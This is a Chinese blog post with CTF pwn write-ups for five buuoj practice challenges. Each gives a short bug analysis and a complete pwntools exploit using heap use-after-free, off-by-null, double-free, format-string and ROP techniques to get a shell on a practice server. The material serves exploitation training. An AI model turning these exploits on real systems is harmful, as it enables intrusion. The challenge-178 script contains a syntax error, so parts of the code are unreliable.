buuoj Pwn writeup 176-180

最新推荐文章于 2023-06-27 12:08:05 发布
最新推荐文章于 2023-06-27 12:08:05 发布
阅读量288 收藏
点赞数 3
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/117458833
版权

176 jarvisoj_itemboard

在这里插入图片描述在这里插入图片描述
进来先申请了一块chunk。

add
在这里插入图片描述在这里插入图片描述

结构简单,但是用了buf做缓冲,在description那里有明显溢出。

list
在这里插入图片描述只支持输出名字。

show
在这里插入图片描述输出细节

free
在这里插入图片描述

但是没有清理指针,造成uaf。

我们就直接通过uaf做就好了。
这道题的uaf也不大一样,以前我们的uaf都很随意,只是用到fastbin chunk而已,但是在这个题里面,因为没有edit函数,导致我们不能即使修改了chunk指针,也因为没法覆写导致不能劫持got表,于是我们在这个题的uaf中引入了全新的unsorted bin。

思路是这样的。
因为chunk中有一个是free函数,所以我们只要把他覆盖掉,覆盖成system就好。我们还需要泄露libc地址,我们可以通过泄露got表,也可以简单点用unsorted bin。

exp

from pwn import *

context.log_level="debug"

r = remote("node3.buuoj.cn", 28946)

elf = ELF("./176")
libc = ELF("./64/libc-2.23.so")

def add(name,num,data):
    r.sendlineafter('choose:\n', '1')
    r.sendlineafter('Item name?\n', name)
    r.sendlineafter("Description's len?\n", str(num))
    r.sendlineafter('Description?\n', data)

def show(index):
    r.sendlineafter('choose:\n', '3')
    r.sendlineafter('Which item?\n', str(index))

def remove(i):
    r.sendlineafter('choose:\n', '4')
    r.sendlineafter('Which item?\n', str(i))
    
add('a'*16,128,'a'*16) #0
add('b'*16,128,'b'*16) #1
add('c'*16,128,'c'*16) #2
remove(0)
show(0)
r.recvuntil('Description:')

main_arena_88 = u64(r.recv(6).ljust(8, "\x00"))
malloc_hook = (main_arena_88 & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_addr= malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_addr + libc.sym['system']
print 'libc_addr = ',hex(libc_addr)

remove(1)
add('c'*16,24,'/bin/sh;aaaaaaaa'+p64(system_addr))
remove(0)

r.interactive()

177 asis2016_b00ks

在这里插入图片描述在这里插入图片描述
进来首先能往bss上读个名字。

在这里插入图片描述
要注意这种自己写的read函数,像这个函数里面就有明显的off by null漏洞。

在这里插入图片描述add里面这两个地方,name跟description都可以溢出。

在这里插入图片描述
在这里插入图片描述
结构简单。

delete
在这里插入图片描述
指针啥的都清理干净了。

edit
在这里插入图片描述
把内容改改。

print

在这里插入图片描述把乱七八糟东西都输出

在这里插入图片描述把之前bss上面的东西改改。

所以我们就通过off by null造吧,看怎么整。

先来好好瞅瞅结构
在这里插入图片描述很清晰,bss上面两个地址,两个地址又指向bss,一个名字,一个addr_array。
每次create就是三个chunk,其中信息都放在第三个chunk中,分别是序号,两个地址,des的大小。

漏洞是哪里的输入都可以有一个off by null。我们的第一想法是因为地址其实都在bss上面,而且堆的写功能也有,能不能通过unlink控制到bss,从而达到利用效果。
但是问题就是需要我们泄露地址,泄露栈地址。泄露不了。
我们考虑去制造overlap去攻击malloc_hook,但是因为在栈上的数据不满足我们one_gadget的要求,而且我们再怎么去通过realloc去抬栈,都没有用,所以这个方式也行不通

我们在这道题可以去利用off by one,通过写名字的时候多写一个字节,讲addr_array的最后一字节改成’\x00’,然后要事先在我们改好的地址那个地方实现伪造一个chunk,从而达到泄露地址,利用等等目的。最后我们选择泄露地址之后将free_hook改正system来达到目的。

# -*- coding: utf-8 -*-
from pwn import*

r = remote("node3.buuoj.cn", "29424")

#r = process("./1771")
context.log_level = "debug"

elf = ELF("./1771")
libc = ELF("./64/libc-2.23.so")
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6")

def add(name_size,name,content_size,content):
    r.sendlineafter('> ', '1')
    r.sendlineafter('size: ', str(name_size))
    r.sendlineafter('chars): ', name)
    r.sendlineafter('size: ', str(content_size))
    r.sendlineafter('tion: ', content)
    
def delete(index):
    r.sendlineafter('> ','2')
    r.sendlineafter('delete: ', str(index))
    
def edit(index,content):
    r.sendlineafter('> ','3')
    r.sendlineafter('edit: ', str(index))
    r.sendlineafter('ption: ', content)
    
def show():
    r.sendlineafter('> ', '4')
    
def change(name):
    r.sendlineafter('> ','5')
    r.sendlineafter('name: ', name)

r.sendlineafter('name: ','a'*0x1f+'b')
add(0xd0,'aaaaaaaa',0x20,'bbbbbbbb') #1
show()
r.recvuntil('aaab')
heap_addr = u64(r.recv(6).ljust(8,'\x00'))
print "heap_addr = " + hex(heap_addr)

add(0x80,'cccccccc',0x60,'dddddddd') #2
add(0x10,'eeeeeeee',0x10,'ffffffff') #3
delete(2)   

edit(1,p64(1)+p64(heap_addr+0x30)+p64(heap_addr+0x30+0x90 + 0xe0 + 0x10)+p64(0x20))
change('a'*0x20)

show()
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00')) & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_base = malloc_hook - libc.symbols['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
print "libc_addr = " + hex(libc_base)
print "malloc_hook = " + hex(malloc_hook)

edit(1,p64(free_hook)+p64(0x8))
edit(3,p64(system_addr))


add(0x60,'/bin/sh\x00',0x60,'/bin/sh\x00')

delete(4)

r.interactive()

178 actf_2019_onerepeater

在这里插入图片描述
在这里插入图片描述有格式化字符串。

要注意返回的时候调用规则跟平常的不大一样。
在这里插入图片描述我们的思路就是给了栈地址,就计算出返回地址,通过格式化字符串讲返回地址改成栈地址之后,讲shellcode写进栈里,跳过去执行。

因为是32位的,我们结合着模板,就搞定了。

from pwn import *                                                                 
                                                                                  
context.log_level = "debug"                         
                                       
r = remote("node3.buuoj.cn","28488")                                             
                                                                                  
r.sendlineafter("3) Exit\n","1")                                                 
                                                                                  
stack_addr = int((r.recv(8)), 16)                                    
print "stack_addr = " + hex(stack_addr)                                                                                                                                                                                                          
ret_addr = stack_addr + 0x418 + 4        

payload = fmtstr_payload(16{ret_addr:stack_addr})  
r.sendline(payload)
                 
r.sendlineafter("3) Exit\n","2")
                 
r.sendlineafter("3) Exit\n","1")                                             
r.sendline(asm(shellcraft.sh()))       

r.sendlineafter("3)Exit\n","3")                                                
r.interactive()

179 ciscn_2019_s_8

在这里插入图片描述在这里插入图片描述
先读入了0x200.

在这里插入图片描述然后strcpy导致了溢出。

但是下面会对我们的输入进行异或操纵,所以我们输入rop的时候要先进行一下异或。

我们写rop也可以用ROPgadget

ROPgadget --binary ./179 --ropchain

from pwn import *
from struct import pack

context.log_level='debug'

def encrypt(data):
    crypto = ''
    for i in data:
        crypto += chr(ord(i) ^ 0x66)
    return crypto

r = remote('node3.buuoj.cn','26395')

def payload():
        p = 'a' * 0x50

        p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
        p += pack('<Q', 0x00000000006ba0e0) # @ .data
        p += pack('<Q', 0x0000000000449b9c) # pop rax ; ret
        p += '/bin//sh'
        p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
        p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
        p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
        p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
        p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
        p += pack('<Q', 0x00000000004006e6) # pop rdi ; ret
        p += pack('<Q', 0x00000000006ba0e0) # @ .data
        p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
        p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
        p += pack('<Q', 0x0000000000449bf5) # pop rdx ; ret
        p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
        p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x0000000000474c00) # add rax, 1 ; ret
        p += pack('<Q', 0x000000000040139c) # syscall

        return p

payload = payload()
r.sendline(encrypt(payload))
r.interactive()

我们发现这样的exp有问题,找到问题后发现是因为我们的payload太长了……
怎样缩短呢?我们可以考虑从最后面的add rax,1尝试下手。

在这里插入图片描述

我们找到了add eax,3, 所以我们就把payload里面替换一下就行。

from pwn import *
from struct import pack

context.log_level='debug'

def encrypt(data):
    crypto = ''
    for i in data:
        crypto += chr(ord(i) ^ 0x66)
    return crypto

r = remote('node3.buuoj.cn','26395')

def payload():
    p = 'a'*0x50
    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e0) # @ .data
    p += pack('<Q', 0x0000000000449b9c) # pop rax ; ret
    p += '/bin//sh'
    p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000047f7b1) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004006e6) # pop rdi ; ret
    p += pack('<Q', 0x00000000006ba0e0) # @ .data
    p += pack('<Q', 0x00000000004040fe) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000449bf5) # pop rdx ; ret
    p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
    p += pack('<Q', 0x0000000000444f00) # xor rax, rax ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474c11) # add rax, 3 ; ret
    p += pack('<Q', 0x0000000000474bf8) # add rax, 2 ; ret
    p += pack('<Q', 0x000000000040139c) # syscall
    return p

payload = payload()

r.sendline(encrypt(payload))

r.interactive()

180 starctf_2019_girlfriend

在这里插入图片描述在这里插入图片描述

在这里插入图片描述构造结果。

show
在这里插入图片描述
输出名字 电话

在这里插入图片描述edit没啥用。

delete
在这里插入图片描述
直接造成了uaf。

我们就是通过uaf常规思路,泄露地址,然后利用起来。
通过double free,攻击malloc_hook - 0x23,再调整栈结构。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

r = remote('node3.buuoj.cn',29601)
#r = process("./180")
elf=ELF('./180')

libc = ELF("./64/libc-2.23.so")

def add(size,name):
        r.sendlineafter(':','1')
	r.sendlineafter('name',str(size))
	r.sendlineafter('name:',name)
	r.sendlineafter('call:',"123456")

def show(idx):
	r.sendlineafter(':','2')
	r.sendlineafter('index:',str(idx))

def delete(idx):
        r .sendlineafter(':','4')
        r .sendlineafter('index:',str(idx))

add(0x80,'aaaa') #0
add(0x68,'aaaa') #1
add(0x68,'aaaa') #2
add(0x20,'aaaa') #3
delete(0)
show(0)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00')) & 0xfffffffffffff000) + (libc.sym['__malloc_hook'] & 0xfff)
libc_base = malloc_hook - libc.sym['__malloc_hook']
one_gadget = libc_base + 0xf1147
realloc = libc_base + libc.sym['__libc_realloc']
print "libc_base = " + hex(libc_base)

add(0x80,'aaaa')#0
delete(1)
delete(2)
delete(1)
#double free

add(0x68,p64(malloc_hook-0x23))
add(0x68, 'aaaa')
add(0x68, 'aaaa')
add(0x68, 'a' * 0xb + p64(one_gadget) + p64(realloc + 2))

r.sendlineafter(':','1') #这里只能写一句,不然会报错。

r.interactive()
yongbaoii
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 394
buuctf-pwn 001-016题wp
BUUCTF笔记之Crypto部分WriteUp(一)
克格莫
05-08 1314
1、RSA1 直接上代码: import gmpy2 as gp p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 q = 12640674973996472769176047937170883420927050821480010581
BUUCTF Crypto [大帝的密码武器] writeup题解
qq_44611153的博客
06-27 255
然后对密文ComeChina用密钥13进行解密如果超出z就减去26让其回到A-z范围内即可得到答案。观察所有数据,发现单词security是有特殊含义的,这样就得到密钥为13。
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 560
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
Asis CTF 2016——b00ks
04-18 360
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ctf理论题1.pdf
10-30
收集的部分ctf理论题,希望对参加ctf遇上理论比赛时有一定的帮助。
Off-By-One Asis CTF 2016 b00ks
qq_39153421的博客
03-09 467
Off-By-One学习、练习0x1、Off-By-One原理0x2、Asis CTF 2016 b00ks1、利用流程:2、泄露过程a、输入用户名,泄露book1地址b、构造假的fake_book结构体,使其指向book2的name和description字段。c、修改book1的描述字段,填入fake_book,输出book,得到book2的name和description地址。d、根据book2的name字段(为什么要是这个字段呢?)由固定偏移计算libcbasee、根据libcbase得到syste
OFF BY ONE AsisCTF2016b00ks
Grxer的博客
03-20 104
题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ksmore有漏洞会多读取一个字节的/x00author name存放在unk_202040+pie处,32个字节分析后可以推断出book结构体是如下的,而且在unk_202060+pie处开始存放结构体指针,我们可以进行一个字节的溢出,来控制book1的最低位地址。
BugkuCTF Crypto wirte up
酉酉的博客
07-18 1430
  1.滴答~滴 (1)思路:很简单,一眼看出是摩斯密码,直接用工具解码得到flag 解密工具:CTFCrakTools 2.聪明的小羊 (1)思路:提示当中看到栅栏就想起栅栏密码,2个栅栏解密,得到flag 解密地址:http://tool.bugku.com/jiemi/ 3.ok (1)思路:直接用Ook解密,得到flag 解密地址https://ww...
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 881
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF webshell后门 writeup
zhangzhaolin12的博客
10-11 733
下载后是一些PHP文件,既然是webshell后门就用D盾扫描一下。 扫描出来的有两个级别5的,但是题目既然说是后门,其中有一个说明里就是已知后门,我就想先看看这个,结果这里面都是一下base64编码的东西,解码后并没有找到MD5的passWord,所以只能再看看第一个,结果一下就开到了pass的值是一个MD5格式的。那这个就是flag了。 $pass = 'ba8e6c6f35a53933b871480bb9a9545c'; //angel ...
BUUCTF Warmup Writeup
zgwz123456的博客
12-25 181
点击链接进来我们发现一个大大的邪恶的笑脸 常规操作先查看源代码 发现有一个提示,提示我们有一个source.php,应该是个源代码,我们进去看一下 这是一段对我们传的file参数的过滤 他首先建立一个白名单,白名单内包含了source.php和hint.php, 第一个判断是如果我们传的file参数为空或者不是字符串就返回false 第二个if判断所传的参数是否在白名单内,如果是则返回正确,不是则进行下一步判断 然后利用mb_substr函数对我们的参数相对于?问号进行分割 再判断参数是否在白名单..
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值